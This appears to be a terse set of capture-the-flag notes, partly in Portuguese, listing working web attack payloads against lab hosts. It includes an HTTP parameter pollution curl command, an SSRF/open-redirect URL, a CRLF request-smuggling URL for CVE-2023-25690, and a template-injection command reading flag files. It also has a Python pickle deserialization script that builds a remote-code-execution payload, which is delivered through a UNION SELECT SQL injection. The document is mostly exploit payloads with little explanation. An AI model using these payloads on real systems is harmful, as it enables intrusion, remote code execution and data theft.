- fcrackzip
- unsquashfs
- sqlmap
- HTTP Parameter Polution (HPP):
curl --location 'http://94.237.55.42:33198/api/withdraw' \ --form 'account="0"' \ --form 'amount="0"' \ # Precisa ser zero para o payload passar --form 'amount="1337"' #
- SSRF (Server Side Request Forgery)
- Open Redirect Attack
http://94.237.60.170:33195/[email protected]:1337/debug/environment
- HTTP Request Smuggling Attack (CVE-2023–25690)
https://github.com/dhmosfunk/CVE-2023-25690-POC/tree/main#internal-http-request-smuggling-via-header-injection
http://94.237.48.205:56566/api/games/click_topia%20HTTP/1.1%0d%0aHost:%20dev.apacheblaze.local%0d%0a%0d%0aGET%20/
- https://webhook.site/ -> Injection content {{.FetchServerInfo "cat /flag*"}}
-
Pickle Remote Code Execution
import pickle import base64 import os payload = 'cp flag.txt application/static/.' # Payload class RCE: def __reduce__(self): return os.system, (payload,) if __name__ == '__main__': print(base64.urlsafe_b64encode(pickle.dumps(RCE())).decode('ascii'))
Injetar payload: GET http://94.237.49.121:31295/view/' UNION SELECT 'gASVOwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjCBjcCBmbGFnLnR4dCBhcHBsaWNhdGlvbi9zdGF0aWMvLpSFlFKULg==
Recuperar flag:
GET http://94.237.49.121:31295/static/flag.txt